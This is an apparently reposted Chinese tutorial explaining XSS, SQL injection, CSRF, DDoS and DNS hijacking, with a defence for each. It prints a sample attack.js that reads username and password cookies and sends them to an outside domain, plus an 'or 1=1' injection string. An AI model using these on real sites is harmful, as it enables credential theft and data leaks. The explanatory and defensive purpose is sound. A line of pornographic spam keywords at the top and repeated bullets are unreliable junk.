性夜影院午夜看片,无码精品久久一区二区三区,婷婷成人丁香五月综合激情,校园春色 qvod,性调教室高h学校

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持

???XSS?攻擊

  • 全稱跨站腳本攻擊?Cross Site Scripting
  • 為了與重疊樣式表?CSS?進(jìn)行區(qū)分,所以換了另一個(gè)縮寫名稱?XSS
  • XSS攻擊者通過篡改網(wǎng)頁(yè),注入惡意的?HTML?腳本,一般是?javascript,在用戶瀏覽網(wǎng)頁(yè)時(shí),控制用戶瀏覽器進(jìn)行惡意操作的一種攻擊方式
  • XSS?攻擊經(jīng)常使用在論壇,博客等應(yīng)用中。攻擊者可以偷取用戶Cookie、密碼等重要數(shù)據(jù),進(jìn)而偽造交易、盜取用戶財(cái)產(chǎn)、竊取情報(bào)等私密信息

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持
  • 就像上圖,如果用戶在評(píng)論框中輸入的并不是正常的文本,而是一段?javascript?腳本,而后臺(tái)又沒對(duì)該用戶的數(shù)據(jù)進(jìn)行處理,直接存入數(shù)據(jù)庫(kù),那么當(dāng)其他用戶過來(lái)訪問該頁(yè)面,瀏覽器必然會(huì)執(zhí)行這段腳本
  • 當(dāng)然這只是惡趣味,而真正的黑客并不會(huì)僅僅滿足這樣的惡趣味,可能更多的是想通過這些?注入腳本,獲取你的?個(gè)人信息?,甚至是你的賬號(hào)密碼等信息

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持
  • 由上圖可知,用戶其實(shí)在評(píng)論的時(shí)候,引入了一個(gè)第三方腳本,在這個(gè)腳本中獲取你瀏覽器的?cookie?信息,并發(fā)送到指定的接口進(jìn)行保存處理,這樣你的信息就已經(jīng)泄露了
// attack.js 中的邏輯
var uname = $.cookie('username'); // 獲取賬號(hào)
var pwd = $.cookie('password'); // 獲取密碼

// 發(fā)送請(qǐng)求
$('body').appendTo('<script src=`http://autofelix.com/index.php?username=${uname}&password=${pwd}`></script>');

  • 在上面邏輯中,腳本中獲取了你的個(gè)人信息,并將你的個(gè)人信息發(fā)送到后端?php?文件中進(jìn)行處理保存,這樣你的個(gè)人信息就已經(jīng)泄露了,所以杜絕?xss攻擊?在網(wǎng)絡(luò)安全中非常的重要
  • 所以后端永遠(yuǎn)不要相信用戶提交的數(shù)據(jù),在接收用戶提交的信息時(shí)候,要進(jìn)行?消毒處理
  • 也就是過濾一些特殊的字符,比如?javascript?腳本中的?<>?進(jìn)行轉(zhuǎn)移?<>?再進(jìn)行存儲(chǔ),這樣就能有效的進(jìn)行?xss?攻擊的預(yù)防
  • 另外如果?cookie?中設(shè)置了?HttpOnly?屬性,那么通過?js?腳本將無(wú)法讀取到cookie?信息,這樣也能有效的防止?XSS?攻擊竊取?cookie?內(nèi)容

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持

?? SQL 注入

  • SQL注入?攻擊指的是攻擊者在?HTTP?請(qǐng)求中注入惡意?SQL?命令,服務(wù)器用請(qǐng)求參數(shù)構(gòu)造數(shù)據(jù)庫(kù)?SQL?命令時(shí),惡意?SQL?被一起構(gòu)造,并在數(shù)據(jù)庫(kù)中執(zhí)行,以便得到數(shù)據(jù)庫(kù)中的感興趣的數(shù)據(jù)或?qū)?shù)據(jù)庫(kù)進(jìn)行讀取、修改、刪除、插入等敏感的操作,從而導(dǎo)致數(shù)據(jù)被隨意篡改
  • 但是?SQL注入?攻擊,需要攻擊者對(duì)數(shù)據(jù)庫(kù)表有所了解才行,比如你的項(xiàng)目?開源?了,不小心公開了數(shù)據(jù)庫(kù)的賬號(hào)和密碼;另外你的網(wǎng)站上線沒有?關(guān)閉調(diào)試模式,有心者可以網(wǎng)站的根據(jù)錯(cuò)誤回顯可以猜測(cè)表結(jié)構(gòu);另外還有就是?盲注,也即是很多有心者會(huì)盲猜數(shù)據(jù)表結(jié)構(gòu),但是這種難度最大
  • SQL注入?可以通過預(yù)編譯手段進(jìn)行預(yù)防,綁定參數(shù)是最好的防?SQL?注入方法?,F(xiàn)在流行的框架基本都實(shí)現(xiàn)了?SQL預(yù)編譯和?參數(shù)綁定,惡意攻擊的?SQL?會(huì)被當(dāng)做?SQL?的參數(shù),而不是?SQL?命令被執(zhí)行
# 正常獲取用戶信息的sql
select * from users where id=1

# sql注入了 1 or 1=1,就可以把用戶表中的所有數(shù)據(jù)全部查出,導(dǎo)致數(shù)據(jù)泄露
select * from users where id=1 or 1=1

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持

???CSRF?攻擊

  • CSRF?全稱?Cross Site Request Forgery,跨站點(diǎn)請(qǐng)求偽造,攻擊者通過跨站請(qǐng)求,以合法的用戶身份進(jìn)行非法操作,如轉(zhuǎn)賬交易、發(fā)表評(píng)論等。其核心是利用了瀏覽器?Cookie?或服務(wù)器的?Session?策略,盜取用戶的身份信息
  • 在打開?A網(wǎng)站?的情況下,另開?Tab頁(yè)面?打開惡意?網(wǎng)站B,此時(shí)在?B頁(yè)面?的?惡意意圖?下,瀏覽器發(fā)起一個(gè)對(duì)?網(wǎng)站A?的?HTTP?請(qǐng)求
  • 因?yàn)橹?A網(wǎng)站?已經(jīng)打開了,瀏覽器存有?A網(wǎng)站?中的?Cookie?或其他用于身份認(rèn)證的信息,這一次被?惡意意圖?的請(qǐng)求,將會(huì)自動(dòng)帶上這些信息,這將會(huì)導(dǎo)致身份劫持,造成并非本人意愿的操作結(jié)果
  • 而對(duì)應(yīng)?CSRF攻擊?的防御策略有:表單token、?驗(yàn)證碼、Referer 檢測(cè)?等

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持

?? DDOS 攻擊

  • DDOS?全稱?Distributed Denial of Service,分布式拒絕服務(wù)攻擊。是拒絕服務(wù)攻擊的升級(jí)版。拒絕攻擊服務(wù)其實(shí)就是讓你的服務(wù)不能正常給用戶提供服務(wù),DDOS?全稱?Distributed Denial of Service,分布式拒絕服務(wù)攻擊。是拒絕服務(wù)攻擊的升級(jí)版。拒絕攻擊服務(wù)其實(shí)就是讓你的服務(wù)不能正常給用戶提供服務(wù)
  • 在早期發(fā)起?DoS攻擊?是一件很容易的事情,只需要寫個(gè)程序讓服務(wù)過載,無(wú)暇提供正常服務(wù)即可,也就是一秒中請(qǐng)求服務(wù)多次,將目標(biāo)服務(wù)器的內(nèi)存跑
  • 后來(lái)隨著技術(shù)的發(fā)展,現(xiàn)在的服務(wù)器都是分布式,并不是單一服務(wù)器提供服務(wù),一個(gè)服務(wù)背后擁有著是數(shù)不清的?CDN節(jié)點(diǎn),也是就擁有著數(shù)不清的Web服務(wù)器。想靠單臺(tái)服務(wù)器去攻擊這種分布式網(wǎng)絡(luò),無(wú)異于對(duì)方以卵擊石?,而且現(xiàn)在很多?DDOS 攻擊?都不是免費(fèi)的,所以很容易造成偷雞不成蝕把米
  • 防御手段:隨著技術(shù)發(fā)展到今天也并不能完全杜絕這種攻擊的出現(xiàn),只能通過技術(shù)去緩解。其中包括:流量清洗SYN Cookie?等等

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持

?? DNS 劫持

  • 當(dāng)今互聯(lián)網(wǎng)流量中,以?HTTP/HTTPS?為主的?Web服務(wù)?產(chǎn)生的流量占據(jù)了絕大部分
  • Web服務(wù)?發(fā)展的如火如荼,這背后離不開一個(gè)默默無(wú)聞的大功臣就是域名解析系統(tǒng),DNS?提供將域名轉(zhuǎn)換成?ip地址?的服務(wù),每一個(gè)域名的解析都要經(jīng)過?DNS?,所以可以看出它的重要性
  • 正是因?yàn)樗闹匾?,所?DNS劫持?很容易被別有用心的人利用
  • 早期并沒有考慮太多的安全性,所以導(dǎo)致?DNS?很容易被劫持
  • 如果攻擊者篡改?DNS解析?設(shè)置,將域名由正常?IP?指向由攻擊者控制的非法?IP,就會(huì)導(dǎo)致我們?cè)L問域名打開的卻不是對(duì)應(yīng)的網(wǎng)站,而是一個(gè)假冒或者別有用心的網(wǎng)站。這種攻擊手段就是?DNS劫持
  • 如果攻擊者篡改?DNS解析?設(shè)置,將域名由正常?IP?指向由攻擊者控制的非法?IP,就會(huì)導(dǎo)致我們?cè)L問域名打開的卻不是對(duì)應(yīng)的網(wǎng)站,而是一個(gè)假冒或者別有用心的網(wǎng)站。這種攻擊手段就是?DNS劫持
  • 如果攻擊者篡改?DNS解析?設(shè)置,將域名由正常?IP?指向由攻擊者控制的非法?IP,就會(huì)導(dǎo)致我們?cè)L問域名打開的卻不是對(duì)應(yīng)的網(wǎng)站,而是一個(gè)假冒或者別有用心的網(wǎng)站。這種攻擊手段就是?DNS劫持
  • 另外可以?安裝SSL證書。SSL證書具備服務(wù)器身份認(rèn)證功能,可以使DNS 劫持導(dǎo)致的連接錯(cuò)誤情況及時(shí)被發(fā)現(xiàn)和終止

一文搞懂│XSS攻擊、SQL注入、CSRF攻擊、DDOS攻擊、DNS劫持

文章轉(zhuǎn)自CSDN,原作者極客飛兔,版權(quán)歸原作者所有,如有侵權(quán)請(qǐng)聯(lián)系刪除

相關(guān)新聞

歷經(jīng)多年發(fā)展,已成為國(guó)內(nèi)好評(píng)如潮的Linux云計(jì)算運(yùn)維、SRE、Devops、網(wǎng)絡(luò)安全、云原生、Go、Python開發(fā)專業(yè)人才培訓(xùn)機(jī)構(gòu)!